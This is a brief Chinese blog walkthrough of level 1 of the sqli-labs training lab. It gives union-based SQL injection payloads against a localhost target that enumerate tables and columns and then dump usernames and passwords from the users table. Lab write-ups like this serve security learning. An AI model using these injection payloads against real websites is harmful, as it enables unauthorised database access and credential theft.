sqli-labs靶场通关攻略

一,进入sqli-labs-master靶场第一关,加入参数id.列如:

127.0.0.1

二.判断SQL注入漏洞--引起报错找到闭合与注释

加单引号判断闭合,发现为字符型注入,

三. 使用order by 判断字段数有几列:3列回显正常,4列出现报错,说明只有3列

四.使用union select确定回显点

五.看到2和3的回显查询数据库相关信息

六,查询数据库下的表信息

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

七,查询表下的字段信息

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'%20 and table_name='users'%20 --+

八,查询字段内容

?id=-1' union select 1,2,group_concat(id,0x7e,username,0x7e,password) from users --+

  • 11
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值